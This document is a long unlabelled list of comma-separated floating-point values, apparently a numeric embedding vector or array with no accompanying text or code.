0.0052055600099265575, 0.009961565025150776, 0.021749893203377724, 0.029056942090392113, -0.01073936652392149, 0.008891195990145206, -0.004028154071420431, -0.013636497780680656, -0.017825206741690636, -0.027544155716896057, -0.0127802025526762, 0.0012148685054853559, 0.010161367245018482, 0.025360602885484695, 0.0055123986676335335, 0.016069801524281502, -0.016212517395615578, 0.01674056611955166, 0.011402994394302368, 0.022120952606201172, 0.007513988297432661, 0.02401907369494438, -0.016269603744149208, 0.03502246364951134, -0.02319132164120674, -0.006197434850037098, 0.013408152386546135, 0.01328684389591217, -0.008605764247477055, -0.0175683181732893, 0.001532411202788353, -0.021849792450666428, -0.009833120740950108, -0.018110638484358788, -0.007984950207173824, -0.005069979932159185, 0.012145116925239563, -0.004838066641241312, -0.004021018277853727, -0.025189343839883804, 0.027686871588230133, 0.01159566082060337, 0.004067400936037302, 0.0008353336015716195, 0.004695350769907236, -0.0027258724439889193, -0.005565917119383812, -0.0004415270814206451, 0.021278930827975273, 0.0028275572694838047, 0.01088921818882227, 0.01751123182475567, 0.011374451220035553, 0.016940368339419365, -0.0008362255757674575, 0.023119963705539703, -0.0017910836031660438, 0.03542206808924675, -0.009133812971413136, 0.010047194547951221, -0.03476557508111, -0.031054964289069176, -0.010953439399600029, 0.01474254485219717, 0.008320332504808903, -0.024361591786146164, -0.010346897877752781, 0.012737387791275978, -0.0013834515120834112, -0.017939379438757896, -0.02504662796854973, -0.0029399460181593895, -0.014093187637627125, 0.012316375970840454, -0.019252365455031395, -0.010361169464886189, -0.01833898387849331, 0.0011649179505184293, 0.002888211514800787, 0.002884643618017435, -0.0009107053629122674, 0.004588313866406679, 0.001312985667027533, -0.010296947322785854, 0.002062243642285466, -0.005251942668110132, 0.0036267659161239862, 0.008191888220608234, -0.009333615191280842, -0.030769532546401024, 0.00563727505505085, 0.008020629175007343, -0.010860675014555454, -0.019366538152098656, -0.011153241619467735, -0.01732570119202137, 0.004499116446822882, 0.017939379438757896, -0.005508830770850182, 0.01101052574813366, 0.006935989484190941, -0.01157425343990326, -0.016483677551150322, 0.002272749552503228, -0.01230924017727375, -0.01079645287245512, 0.009276528842747211, 0.02361946925520897, -0.0034590750001370907, 0.012302104383707047, 0.015556025318801403, 0.03613564744591713, 0.009925886057317257, -0.009697540663182735, 0.016769109293818474, 0.011260278522968292, -0.005558781325817108, 0.009240849874913692, 0.011545710265636444, 0.021564362570643425, -0.03233940526843071, 0.009269393049180508, -0.005630139261484146, -0.002823989372700453, -0.01903829164803028, -0.0014003990218043327, 0.003814080497249961, 0.018895575776696205, 0.002531422069296241, 0.0006364234141074121, -0.005680089816451073, -0.022263668477535248, 0.02183552086353302, 0.02059389464557171, 0.024176061153411865, -0.010582379065454006, 0.0033877170644700527, -0.00028565464890562, 0.0007581778336316347, 0.000783153111115098, 0.026202626526355743, 0.004620424937456846, 0.02467556670308113, 0.023234136402606964, 0.01504224818199873, 0.011153241619467735, -0.02290588989853859, -0.017810935154557228, -0.011795463040471077, 0.015127877704799175, -0.01307990588247776, -0.01572728343307972, 0.0014102107379585505, -0.007528259884566069, 0.0002780728682409972, -0.018124910071492195, -0.01058951485902071, 0.0009874150855466723, 0.012494770810008049, -0.01791083626449108, 0.011617068201303482, 0.01745414547622204, -0.004131623078137636, 0.0066327182576060295, 0.01655503548681736, -0.02046545036137104, -0.01302281953394413, 0.005287621635943651, 0.010832131840288639, -0.020394092425704002, -0.018410341814160347, -0.011046204715967178, 0.005708632990717888, -0.013800621032714844, 0.004181573633104563, -0.023048605769872665, -0.007628160994499922, 0.01661212183535099, -0.005012893583625555, 0.0010248780017718673, -0.004388511646538973, -0.006964532658457756, 0.009212306700646877, 0.013986151665449142, 0.011681290343403816, -0.006300903856754303, -0.013729263097047806, 0.011402994394302368, -0.039075594395399094, 0.010625193826854229, -0.006432916037738323, -0.001172053744085133, 0.0021621447522193193, -0.004003178793936968, -0.015142149291932583, -0.0027954461984336376, 0.0013415288412943482, 0.0009829552145674825, 0.024960998445749283, -0.014549878425896168, -0.021635720506310463, -0.017068812623620033, 0.00996870081871748, 0.0036820683162659407, 0.0005820129881612957, -0.013693584129214287, -0.006086830049753189, 0.0036999078001827, 0.011039068922400475, 0.03730591759085655, -0.011488623917102814, 0.022877346724271774, 0.00786364171653986, 0.006618446670472622, 0.006304471753537655, -0.004395647440105677, 0.010689415968954563, -0.0008674446726217866, -0.0041565983556210995, -0.010453934781253338, 0.0007786932401359081, -0.010568107478320599, -0.01578436978161335, 0.01786802150309086, -0.033738020807504654, 0.008020629175007343, -0.0053803869523108006, -0.014014694839715958, 0.007628160994499922, -0.018367527052760124, -0.011731240898370743, -0.004356400575488806, -0.007720926310867071, 0.01999448798596859, 0.013087041676044464, 0.010461070574820042, -0.019123921170830727, 0.012202203273773193, 0.011716969311237335, -0.013822028413414955, 0.019851772114634514, -0.010261268354952335, -0.006586335599422455, -0.009283664636313915, 0.020779425278306007, 0.006861063651740551, 0.026502329856157303, -0.018367527052760124, 0.025646034628152847, 0.002172848442569375, -0.01195245049893856, -0.009925886057317257, 0.0077780126594007015, 0.02942800335586071, 0.008191888220608234, -0.02544623240828514, -0.0186957735568285, -0.007092976476997137, -0.017240071669220924, -0.0074997167102992535, 0.015413309447467327, 0.008099122904241085, -0.010161367245018482, 0.011203192174434662, -0.007635296788066626, -0.016897553578019142, -0.00822043139487505, 0.013543732464313507, 0.024761196225881577, 0.01136731542646885, -0.006436483934521675, -0.0012523314217105508, 0.001967694377526641, 0.02486109733581543, -0.037705522030591965, 0.02361946925520897, -0.014378619380295277, 0.016997454687952995, -0.00025086765526793897, 0.006026175804436207, 0.005569485016167164, -0.0013245813315734267, 0.039189767092466354, -0.004538363311439753, -0.01833898387849331, 0.022392112761735916, 0.01905256323516369, -0.0011238871375098825, -0.009483466856181622, -0.014842445962131023, -0.0065649282187223434, 0.008741344325244427, -0.003742722561582923, 0.032482121139764786, 0.019209550693631172, -0.010239860974252224, 0.008941146545112133, 0.017311429604887962, 0.00919803511351347, 0.0015752259641885757, 0.00206937943585217, 0.005672954022884369, -0.017182985320687294, -0.017054541036486626, -0.0077423336915671825, -0.011709833517670631, -0.007685247343033552, 0.018481699749827385, 0.019138192757964134, -0.027786772698163986, -0.003814080497249961, 0.004174437839537859, 0.0037569941487163305, -0.0029345941729843616, 0.005344707984477282, 0.01638377644121647, 0.004153030458837748, 0.010468206368386745, 0.004895152989774942, -0.016183974221348763, 0.02070806734263897, -0.0019266636809334159, -0.005062844138592482, 0.022591914981603622, -0.012237882241606712, -0.027201637625694275, -0.015199235640466213, 0.004848770331591368, 0.024347320199012756, 0.006750458851456642, 0.0006083262269385159, -0.00816334504634142, -0.013522325083613396, 0.007842234335839748, -0.014300125651061535, 0.0015404389705508947, -0.007196445483714342, -0.0007996546337381005, -0.008398826234042645, -0.00872707273811102, -0.015741555020213127, -0.002959569450467825, -0.021935421973466873, 0.006504273973405361, 0.002320916159078479, 0.0031754272058606148, -0.007185741793364286, 0.012765930965542793, 0.00377483363263309, 0.014171681366860867, 0.0054767196998000145, 0.0009240849758498371, 0.0003817648394033313, 0.02663077414035797, -0.011295957490801811, -0.0018606575904414058, 0.001393263228237629, 0.021678535267710686, 0.013393880799412727, -0.008441640995442867, -0.00719287758693099, 0.007663839962333441, 0.018167724832892418, 0.024233147501945496, 0.0023334037978202105, 0.02243492752313614, 0.016483677551150322, -0.016811924055218697, -0.0003839947748929262, 0.013443831354379654, -0.016683479771018028, -0.011003389954566956, -0.015584568493068218, -0.02427596226334572, -0.008662850596010685, -0.00016468069225084037, 0.01584145613014698, 0.02645951509475708, 0.013186942785978317, 0.013986151665449142, -0.011402994394302368, -0.000025574565370334312, 0.008769887499511242, -0.017525503411889076, -0.020508265122771263, 0.02782958745956421, 0.004656103905290365, 0.018838489428162575, -0.0021514410618692636, 0.0042243883945047855, -0.021507276222109795, -0.023776456713676453, -0.015170692466199398, -0.02942800335586071, 0.025360602885484695, -0.0112745501101017, -0.002597428159788251, -0.0034287478774785995, 0.007763741072267294, 0.013393880799412727, -0.007521124090999365, 0.0037676978390663862, 0.0024065456818789244, -0.01260894350707531, 0.014128866605460644, -0.0035554079804569483, 0.012466227635741234, 0.012837288901209831, 0.0006457891431637108, -0.01636950485408306, -0.003405556548386812, 0.005387522745877504, -0.012480499222874641, -0.013572275638580322, 0.0031843469478189945, 0.004955807235091925, -0.011467216536402702, -0.0027990140952169895, 0.004634696524590254, -0.0002747279650066048, 0.0038319199811667204, 0.008941146545112133, -0.005316164810210466, 0.013308251276612282, -0.0029345941729843616, 0.018824217841029167, 0.01557029690593481, 0.005391090642660856, 0.007485445123165846, -0.005801398307085037, -0.0025082307402044535, 0.0010436094598844647, 0.005819237791001797, -0.015142149291932583, -0.016826195642352104, 0.004302882123738527, 0.008020629175007343, -0.029099756851792336, -0.008384554646909237, -0.01023272518068552, -0.01614115945994854, -0.006514977663755417, 0.004424190614372492, -0.010054330341517925, 0.010197046212852001, 0.011260278522968292, -0.011945314705371857, 0.022977247834205627, -0.019195279106497765, 0.017668219283223152, -0.006589903496205807, 0.004524091724306345, 0.021878335624933243, -0.011888228356838226, 0.017068812623620033, 0.009219442494213581, -0.011909635737538338, 0.014307261444628239, -0.01370071992278099, -0.008234702982008457, -0.0024654159788042307, -0.024989541620016098, -0.007835098542273045, 0.0038890063297003508, 0.012808745726943016, 0.004028154071420431, 0.012323511764407158, 0.013550868257880211, 0.0057942625135183334, 0.013522325083613396, -0.024076160043478012, -0.0025367739144712687, -0.017225800082087517, 0.0334525890648365, -0.042272429913282394, 0.0010792884277179837, 0.0010971279116347432, -0.0058263735845685005, -0.00427077105268836, -0.013101313263177872, -0.020322734490036964, 0.0033270628191530704, -0.0033645257353782654, -0.009754627011716366, -0.006664829328656197, -0.004427758511155844, 0.007849370129406452, 0.002031916519626975, -0.007239260245114565, -0.0020105091389268637, 0.003942524548619986, 0.007160766515880823, -0.011089019477367401, 0.002740143798291683, -0.008248974569141865, 0.018852761015295982, 0.0012371678603813052, -0.00561943557113409, 0.0011319149052724242, 0.01210230216383934, -0.011402994394302368, 0.013272572308778763, 0.014514199458062649, -0.02177843637764454, 0.005929842591285706, -0.006304471753537655, 0.0035447042901068926, 0.012451956048607826, -0.008448776789009571, -0.002310212468728423, -0.027544155716896057, -0.02693047747015953, 0.004342128988355398, -0.02782958745956421, -0.0051734489388763905, -0.044527336955070496, -0.002595644211396575, -0.009219442494213581, -0.0002439548698021099, 0.005259078461676836, 0.0019123920938000083, 0.014414298348128796, 0.012016672641038895, -0.013308251276612282, -0.0036481732968240976, -0.017539774999022484, -0.001563630299642682, 0.016597850248217583, 0.0033591738902032375, -0.022235125303268433, 0.008027764968574047, 0.015613111667335033, 0.002488607307896018, -0.000028877655495307408, 0.03393782302737236, -0.0183247122913599, -0.014813902787864208, -0.01385057158768177, 0.00878415908664465, -0.013358201831579208, 0.02782958745956421, 0.031112050637602806, -0.0047845481894910336, 0.0036446054000407457, 0.0011221031891182065, 0.011681290343403816, 0.026416700333356857, -0.014036101289093494, -0.010403984226286411, 0.018067823722958565, 0.002451144391670823, 0.03128330782055855, 0.01557029690593481, -0.0068075451999902725, -0.019908858463168144, -0.006900310516357422, -0.006975236348807812, -0.012751659378409386, 0.010246996767818928, -0.00961191114038229, -0.007228556554764509, 0.03779115155339241, 0.01773957721889019, -0.0067040761932730675, -0.0007229448528960347, -0.011431537568569183, 0.000996334827505052, 0.026245441287755966, -0.00249217520467937, 0.008263246156275272, -0.0018820649711415172, -0.0009142732596956193, 0.004377807956188917, 0.010503885336220264, -0.011246006935834885, -0.0050664120353758335, -0.0044705732725560665, 0.007571074645966291, -0.004656103905290365, 0.021692806854844093, -0.0036927720066159964, 0.009654725901782513, -0.008348875679075718, -0.002884643618017435, -0.020750882104039192, -0.017525503411889076, 0.0049272640608251095, -0.029884694144129753, 0.0020426202099770308, 0.0028650201857089996, -0.013087041676044464, -0.0069823721423745155, -0.012787338346242905, 0.008505863137543201, 0.013772077858448029, 0.014314397238194942, 0.00837028305977583, 0.012380598112940788, -0.0025867244694381952, -0.030997877940535545, -0.006122509017586708, -0.018795674666762352, -0.008206159807741642, 0.016540763899683952, -0.003093365579843521, 0.027272995561361313, -0.0036856362130492926, 0.004456301685422659, -0.008734208531677723, 0.027743957936763763, -0.012509042397141457, 0.008420233614742756, -0.010760773904621601, -0.021664263680577278, -0.003906845580786467, -0.008677122183144093, -0.004905856680124998, 0.028457535430788994, -0.0010980198858305812, 0.0017678922740742564, 0.003806944703683257, -0.011809734627604485, 0.004741733428090811, -0.028457535430788994, -0.006076126359403133, 0.006664829328656197, 0.01462837215512991, -0.01195245049893856, 0.00899109710007906, -0.012273561209440231, -0.0011961370473727584, -0.010760773904621601, -0.015085062943398952, -0.00816334504634142, 0.004178005736321211, 0.004870177712291479, -0.003416260238736868, 0.003489402122795582, -0.01743987388908863, 0.022320754826068878, -0.016212517395615578, -0.005540941841900349, 0.004980782512575388, 0.004616857040673494, -0.001565414248034358, 0.00012532233085948974, -0.00022767634072806686, -0.02016574703156948, -0.011845413595438004, -0.0048202271573245525, -0.010311218909919262, 0.01721152849495411, -0.0029756249859929085, -0.008270381949841976, 0.013500917702913284, 0.0034323157742619514, -0.012316375970840454, -0.001387911383062601, 0.013829164206981659, -0.019352266564965248, 0.002308428520336747, 0.0194521676748991, -0.006800409406423569, -0.011074747890233994, 0.01785374991595745, -0.004095944110304117, 0.008976825512945652, -0.006721915677189827, -0.01826762594282627, 0.0029328102245926857, 0.004149462562054396, -0.01815345324575901, 0.007956407032907009, -0.01234491914510727, -0.0209506843239069, -0.012751659378409386, -0.0028329091146588326, -0.004706054460257292, -0.009240849874913692, 0.008798430673778057, -0.00037953490391373634, 0.005847780965268612, -0.017382787540555, -0.00646502710878849, 0.020479721948504448, -0.013443831354379654, 0.011731240898370743, -0.00041075400076806545, -0.007963542826473713, -0.014185952953994274, 0.01950925402343273, 0.01406464446336031, 0.01178119145333767, -0.004766708705574274, -0.001429834170266986, 0.00854154210537672, 0.009954429231584072, 0.002750847488641739, 0.011531438678503036, -0.0063544223085045815, -0.014243039302527905, -0.004588313866406679, 0.008584356866776943, 0.02207813784480095, 0.00618316326290369, 0.01602698676288128, 0.007274939212948084, -0.002460064133629203, 0.012558992952108383, 0.007892184890806675, -0.0030416310764849186, -0.003230729606002569, 0.0011149673955515027, 0.0017536208033561707, -0.013108449056744576, -0.02587438002228737, 0.014228767715394497, 0.01596990041434765, 0.01796792261302471, 0.001461053267121315, 0.002064027590677142, 0.025260701775550842, -0.008605764247477055, 0.01565592549741268, -0.026545144617557526, 0.0074283587746322155, -0.019723327830433846, -0.010732230730354786, -0.0014878124929964542, 0.019252365455031395, 0.008191888220608234, 0.00018396961968392134, 0.0011310229310765862, 0.0005806750268675387, -0.0034929700195789337, -0.009490602649748325, 0.02805793285369873, -0.016640665009617805, 0.0022263668943196535, -0.005198424216359854, -0.0050664120353758335, -0.012109437957406044, -0.00012900172441732138, -0.004877313505858183, 0.0196376983076334, -0.028728695586323738, 0.017225800082087517, 0.010653737001121044, -0.006903878413140774, 0.03784823790192604, 0.02854316495358944, 0.0020925707649439573, -0.010618058033287525, -0.024989541620016098, 0.0009285448468290269, 0.011246006935834885, -0.01236632652580738, -0.007849370129406452, 0.007856505922973156, 0.017168713733553886, -0.011617068201303482, 0.010603786446154118, -0.0057229045778512955, -0.02242065593600273, -0.012808745726943016, -0.011531438678503036, -0.01281588152050972, -0.002956001553684473, -0.003034495282918215, 0.03199688717722893, 0.0004700702556874603, 0.01417881716042757, -0.00884124543517828, -0.005508830770850182, -0.006165323778986931, 0.014970890246331692, -0.01721152849495411, 0.011345908045768738, 0.005944114178419113, -0.004987918306142092, 0.008627171628177166, 0.018966933712363243, -0.014285854063928127, 0.011024797335267067, -0.018239082768559456, -0.0036517411936074495, -0.006957396864891052, -0.02610272541642189, -0.025232158601284027, -0.005762151442468166, -0.0034037725999951363, 0.005262646358460188, 0.012730251997709274, -0.00910526979714632, -0.020565351471304893, -0.00421368470415473, -0.002062243642285466, -0.000639545323792845, 0.011659882962703705, -0.005316164810210466, -0.012537585571408272, 0.004035289864987135, 0.006411508657038212, -0.0012532233959063888, -0.006322311237454414, 0.02728726714849472, -0.0021924718748778105, 0.004431326407939196, -0.001106047653593123, -0.03328133001923561, 0.010054330341517925, -0.013458102941513062, 0.005954817868769169, -0.010717959143221378, 0.02284880355000496, -0.0017661083256825805, -0.000011121799616375938, -0.007913592271506786, -0.01394333690404892, 0.012116573750972748, 0.017040269449353218, 0.021692806854844093, 0.010111416690051556, -0.009333615191280842, -0.0007398923626169562, -0.011146105825901031, -0.005355411674827337, 0.00848445575684309, -0.016526492312550545, -0.016954639926552773, -0.013272572308778763, -0.013479510322213173, -0.0015547105576843023, 0.007927863858640194, -0.02142164669930935, 0.011531438678503036, -0.009419244714081287, -0.006429348140954971, 0.017939379438757896, -0.01798219420015812, 0.019066834822297096, 0.006011904217302799, -0.03279609605669975, 0.0030041681602597237, -0.018424613401293755, 0.022706087678670883, -0.015142149291932583, -0.005045004654675722, -0.008149073459208012, 0.019138192757964134, 0.00100168667268008, -0.01236632652580738, -0.0015413309447467327, -0.004838066641241312, -0.0029060509987175465, -0.014285854063928127, 0.006365125998854637, -0.00406383303925395, 0.02587438002228737, 0.0035036737099289894, -0.004538363311439753, 0.012380598112940788, 0.0020836510229855776, 0.0061403485015034676, -0.00406383303925395, 0.01732570119202137, 0.00200337334536016, -0.003596438793465495, 0.010817860253155231, -0.006104669533669949, -0.024361591786146164, 0.009262257255613804, -0.008805566467344761, -0.019380809739232063, -0.013979015871882439, 0.019138192757964134, 0.010018651373684406, -0.024718381464481354, -0.018239082768559456, 0.011495759710669518, -0.016098344698548317, 0.0032913838513195515, -0.020979227498173714, 0.00192487973254174, 0.0043992153368890285, 0.0074997167102992535, 0.027544155716896057, -0.00949773844331503, -0.006964532658457756, -0.012958597391843796, 0.027801044285297394, -0.004242227878421545, -0.007406951393932104, -0.013515189290046692, -0.005037868861109018, 0.007542531471699476, 0.023990530520677567, 0.0029827607795596123, 0.028728695586323738, 0.002752631437033415, -0.032910268753767014, -0.007299914490431547, 0.011360179632902145, -0.0008562949951738119, -0.019380809739232063, -0.01745414547622204, 0.005726472474634647, 0.00524837477132678, -0.002927458379417658, -0.019494982436299324, -0.018367527052760124, -0.02437586337327957, 0.007050161715596914, -0.00034697784576565027, -0.010239860974252224, -0.0063865333795547485, 0.014885260723531246, 0.005565917119383812, 0.02516080066561699, 0.02587438002228737, -0.003781969426199794, 0.006579199805855751, -0.0009793873177841306, -0.00192487973254174, -0.006218842230737209, -0.0054517448879778385, -0.011945314705371857, 0.010418255813419819, 0.01551321055740118, 0.02925674431025982, 0.0035482721868902445, -0.008605764247477055, 0.007749469485133886, 0.01515642087906599, -0.011638475582003593, 0.0007439062464982271, 0.011053340509533882, 0.0062473854050040245, 0.02670213207602501, 0.01017563883215189, -0.004656103905290365, -0.036278363317251205, -0.011795463040471077, 0.0058263735845685005, 0.0046132891438901424, 0.003343118354678154, -0.019437896087765694, -0.006550656631588936, 0.003377013374119997, 0.01112469844520092, -0.02954217605292797, 0.016540763899683952, 0.0010123903630301356, -0.015613111667335033, -0.00048657177831046283, 0.00333598256111145, -0.008191888220608234, 0.00419584522023797, 0.021435918286442757, -0.007335593458265066, -0.003237865399569273, -0.015199235640466213, -0.012637486681342125, -0.012594671919941902, 0.011624203994870186, 0.009476331062614918, -0.024290233850479126, 0.01762540452182293, 0.005519534461200237, 0.012958597391843796, -0.01578436978161335, -0.0056515466421842575, 0.006454323418438435, -0.005490991286933422, -0.017311429604887962, -0.013636497780680656, 0.002622403437271714, 0.002383354352787137, -0.008270381949841976, 0.0036249819677323103, 0.00816334504634142, 0.016069801524281502, 0.02224939689040184, -0.008363147266209126, 0.008712801150977612, 0.006789705716073513, -0.0037248830776661634, -0.0018660094356164336, -0.008405962027609348, 0.0024761196691542864, -0.02313423529267311, -0.02431877702474594, -0.014050372876226902, -0.0071108159609138966, 0.022677544504404068, 0.017539774999022484, 0.009062455035746098, -0.024404406547546387, 0.00655779242515564, 0.004042425658553839, -0.005212695803493261, -0.003803376806899905, 0.013151263818144798, 0.010332626290619373, -0.006721915677189827, 0.020451178774237633, -0.008983961306512356, 0.003535784548148513, 0.007050161715596914, -0.006315175443887711, 0.0053839548490941525, 0.0014191304799169302, -0.012708844617009163, -0.006475730799138546, 0.031169136986136436, 0.006375829689204693, 0.033252786844968796, 0.01213798113167286, -0.004895152989774942, 0.0032967356964945793, -0.011681290343403816, 0.024718381464481354, 0.015941357240080833, -0.001600201241672039, -0.006065422669053078, -0.006932421587407589, -0.03328133001923561, 0.006400804966688156, 0.006629150360822678, -0.01892411895096302, -0.009490602649748325, -0.003095149528235197, -0.00916235614567995, -0.0194521676748991, 0.0019534227903932333, 0.00519128842279315, 0.026473786681890488, 0.01638377644121647, -0.017839478328824043, -0.0006622906657867134, 0.006347286514937878, 0.015713011845946312, 0.008734208531677723, -0.002278101397678256, 0.04401355981826782, -0.009626182727515697, 0.018110638484358788, -0.005362547468394041, -0.0010141743114218116, -0.03593584522604942, 0.00046115051372908056, 0.0016251765191555023, -0.020907869562506676, -0.01916673593223095, 0.01073936652392149, 0.011153241619467735, 0.03085516206920147, 0.007899320684373379, 0.006750458851456642, -0.0077423336915671825, -0.012651758268475533, 0.013707855716347694, 0.013979015871882439, -0.0005570377106778324, 0.008363147266209126, -0.019238093867897987, -0.006418644450604916, -0.005123498383909464, -0.010282675735652447, 0.03553624078631401, 0.0014708649832755327, -0.0005962845752947032, 0.004873745609074831, -0.017339972779154778, -0.0051698810420930386, 0.01903829164803028, 0.011759784072637558, -0.014913803897798061, -0.017711034044623375, 0.0016831548418849707, 0.0357074998319149, 0.011552846059203148, -0.00457047438248992, -0.022805988788604736, 0.007349865045398474, 0.021250387653708458, 0.008241838775575161, 0.008063443936407566, 0.007274939212948084, 0.016269603744149208, 0.0014521335251629353, -0.02202105149626732, -0.02670213207602501, 0.016298146918416023, 0.01013995986431837, -0.024832554161548615, 0.00987593550235033, -0.016826195642352104, 0.014285854063928127, 0.002033700468018651, 0.001066800788976252, 0.015827184543013573, -0.0017509448807686567, 0.005291189532727003, 0.019780414178967476, 0.02741571143269539, 0.0034572910517454147, -0.030940791592001915, 0.010625193826854229, -0.002622403437271714, 0.022748902440071106, -0.001965910429134965, 0.00428861053660512, -0.019951673224568367, -0.011510031297802925, 0.004638264421373606, 0.008712801150977612, -0.0036142782773822546, 0.029513632878661156, -0.003963931929320097, 0.0011872173054143786, -0.008655714802443981, -0.006236681714653969, 0.01133163645863533, 0.009412108920514584, 0.01234491914510727, 0.006375829689204693, -0.004135190974920988, 0.010211317799985409, 0.011003389954566956, -0.0071143838576972485, 0.00842736940830946, 0.000046243272663559765, 0.008805566467344761, 0.0028275572694838047, -0.013251164928078651, -0.01101052574813366, 0.0023744346108287573, 0.004317153710871935, 0.017639676108956337, 0.004053129348903894, 0.005180584732443094, -0.008548677898943424, 0.010154231451451778, 0.007239260245114565, 0.0032931677997112274, 0.01515642087906599, -0.007599617820233107, -0.036877769976854324, 0.007556803058832884, 0.005280485842376947, -0.0037284509744495153, -0.015327679924666882, 0.00007932993321446702, 0.011060476303100586, 0.014870989136397839, -0.02670213207602501, 0.000996334827505052, -0.008805566467344761, 0.003560759825631976, -0.005216263700276613, -0.005127066280692816, -0.011053340509533882, -0.0037962410133332014, -0.0005182368331588805, 0.0004520077782217413, -0.010389712639153004, -0.00408167252317071, 0.019951673224568367, 0.0032895999029278755, -0.01017563883215189, 0.029627805575728416, 0.024960998445749283, -0.014193088747560978, 0.007271371316164732, -0.010054330341517925, 0.01275879517197609, -0.020080117508769035, -0.0162553321570158, -0.02581729367375374, 0.00839169044047594, -0.02242065593600273, 0.01601271517574787, -0.011545710265636444, -0.007642432581633329, -0.015070791356265545, 0.001567198196426034, 0.001996237551793456, -0.015470395796000957, 0.026202626526355743, -0.029713435098528862, 0.005697929300367832, -0.01198812946677208, 0.029741978272795677, -0.00899109710007906, 0.02164999209344387, -0.018909847363829613, -0.0020515399519354105, 0.013365337625145912, -0.014292989857494831, 0.015527482144534588, 0.011581389233469963, 0.020137203857302666, 0.027544155716896057, -0.0062473854050040245, -0.000222770482650958, -0.006547088734805584, 0.009205170907080173, 0.018139181658625603, 0.00839169044047594, -0.024547122418880463, -0.00015052060189191252, 0.00889833178371191, -0.02010866068303585, -0.0016109049320220947, -0.015998443588614464, 0.023177050054073334, -0.00822043139487505, 0.0020140770357102156, -0.0011113994987681508, -0.001998021500185132, 0.0014066428411751986, -0.0234910249710083, -0.014507063664495945, 0.005437473300844431, 0.013693584129214287, -0.009811713360249996, 0.010839267633855343, 0.01322975754737854, 0.01988031528890133, 0.009383565746247768, -0.026488058269023895, -0.012130845338106155, 0.021978236734867096, -0.004299314226955175, -0.014970890246331692, -0.004424190614372492, -0.002278101397678256, 0.004438462201505899, 0.02100777067244053, 0.01636950485408306, 0.01379348523914814, -0.0024457925464957952, 0.0164408627897501, 0.013558004051446915, -0.018239082768559456, 0.003628549864515662, 0.01903829164803028, 0.00775660527870059, -0.0023601630236953497, 0.031540196388959885, 0.004038857761770487, -0.008291789330542088, 0.000854065059684217, 0.03370947763323784, 0.010882082395255566, -0.004053129348903894, 0.019209550693631172, 0.05132061243057251, -0.0019337994745001197, 0.020265648141503334, 0.004413486924022436, -0.026074182242155075, 0.013957608491182327, 0.009376429952681065, 0.022335026413202286, -0.015127877704799175, -0.0129657331854105, -0.014335804618895054, 0.022392112761735916, 0.0003532216651365161, 0.00030817699735052884, 0.01791083626449108, -0.005569485016167164, 0.01666920818388462, -0.030484100803732872, 0.003266408573836088, 0.0027740388177335262, 0.015284865163266659, 0.012501906603574753, 0.0026188355404883623, 0.0067361872643232346, -0.021849792450666428, 0.01121746376156807, 0.011995265260338783, -0.01755404658615589, -0.018438884988427162, -0.0022281508427113295, -0.001241627731360495, 0.02023710496723652, -0.053604066371917725, 0.027258723974227905, 0.0016626394353806973, 0.019295180216431618, 0.0034911860711872578, -0.02794376015663147, 0.004545499105006456, 0.007835098542273045, 0.0036231980193406343, -0.010104280896484852, -0.0015805778093636036, 0.017254343256354332, 0.0005374142783693969, 0.009476331062614918, 0.00801349338144064, -0.018909847363829613, -0.004955807235091925, 0.0020105091389268637, 0.0006484650657512248, 0.005662250332534313, 0.0004669483460020274, 0.022335026413202286, 0.0037534262519329786, 0.0005614975816570222, -0.012558992952108383, 0.0055480776354670525, 0.006654125638306141, 0.008520134724676609, -0.0024636320304125547, -0.009647590108215809, -0.019066834822297096, -0.0022673977073282003, 0.029342373833060265, 0.0029345941729843616, -0.014771088026463985, 0.001351340557448566, 0.017725305631756783, 0.01715444214642048, 0.005840645171701908, -0.000019163502656738274, -0.013622226193547249, -0.010453934781253338, 0.01153857447206974, -0.012501906603574753, 0.01666920818388462, 0.02504662796854973, -0.013208350166678429, 0.025902923196554184, -0.008363147266209126, 0.0139076579362154, 0.005009325686842203, 0.00033226030063815415, -0.007749469485133886, -0.0026759218890219927, 0.0011881092796102166, -0.0014119946863502264, 0.0043992153368890285, -0.004499116446822882, 0.0013807755894958973, -0.01826762594282627, -0.0037891052197664976, -0.01053242851048708, -0.013565139845013618, 0.022406384348869324, 0.005587324500083923, -0.014314397238194942, 0.013836300000548363, -0.01905256323516369, 0.020479721948504448, 0.02046545036137104, 0.012951461598277092, -0.004038857761770487, 0.005858484655618668, 0.012180795893073082, 0.017397059127688408, -0.030512643977999687, 0.014842445962131023, 0.0037855373229831457, -0.006600607186555862, -0.010932032018899918, -0.03285318240523338, 0.0013584763510152698, -0.023590926080942154, -0.012359190732240677, 0.019908858463168144, -0.0015859296545386314, -0.04906570166349411, 0.011074747890233994, 0.03496537730097771, -0.027087464928627014, -0.016654936596751213, -0.01002578716725111, 0.010874946601688862, -0.010189910419285297, 0.009412108920514584, 0.003746290458366275, 0.012038080021739006, 0.018553057685494423, -0.022092409431934357, 0.014264446683228016, -0.001346880686469376, 0.0017607564805075526, 0.011966722086071968, 0.023005791008472443, 0.017996465787291527, 0.001670667203143239, -0.002850748598575592, 0.0036214140709489584, -0.01379348523914814, 0.0014530254993587732, 0.010882082395255566, -0.02099349908530712, -0.019437896087765694, -0.011231735348701477, -0.0001907709229271859, 0.022349298000335693, 0.006729051470756531, 0.006304471753537655, -0.011246006935834885, -0.006054718978703022, 0.028157832100987434, 0.006090397946536541, -0.006547088734805584, -0.008034900762140751, 0.016997454687952995, 0.0037213151808828115, -0.006661261431872845, -0.013993287459015846, 0.04532654583454132, 0.00009081409370992333, -0.002986328676342964, 0.02202105149626732, -0.0017928675515577197, -0.011602796614170074, -0.015441852621734142, -0.014642643742263317, 0.002522502327337861, -0.00044108109432272613, -0.00863430742174387, -0.016926096752285957, 0.008677122183144093, 0.0053803869523108006, -0.005098523106426001, -0.010218453593552113, -0.0014744328800588846, -0.0034358836710453033, -0.012073758989572525, -0.007820826955139637, -0.018310440704226494, -0.0011613500537350774, 0.021036313846707344, 0.004356400575488806, -0.014243039302527905, 0.017896564677357674, 0.015684468671679497, 0.0037855373229831457, 0.004898720886558294, -0.03416616842150688, 0.02022283338010311, -0.011510031297802925, 0.029028398916125298, -0.019794685766100883, 0.009526281617581844, 0.020379820838570595, -0.004267203155905008, 0.0057229045778512955, -0.004902288783341646, -0.007449766155332327, 0.01631241850554943, 0.003453723154962063, -0.005605163984000683, -0.014050372876226902, -0.011174649000167847, -0.0015386550221592188, 0.006347286514937878, -0.002249558223411441, -0.004263635259121656, 0.0023351877462118864, -0.008099122904241085, -0.004003178793936968, -0.02142164669930935, 0.01845315657556057, 0.006304471753537655, -0.0003639253554865718, 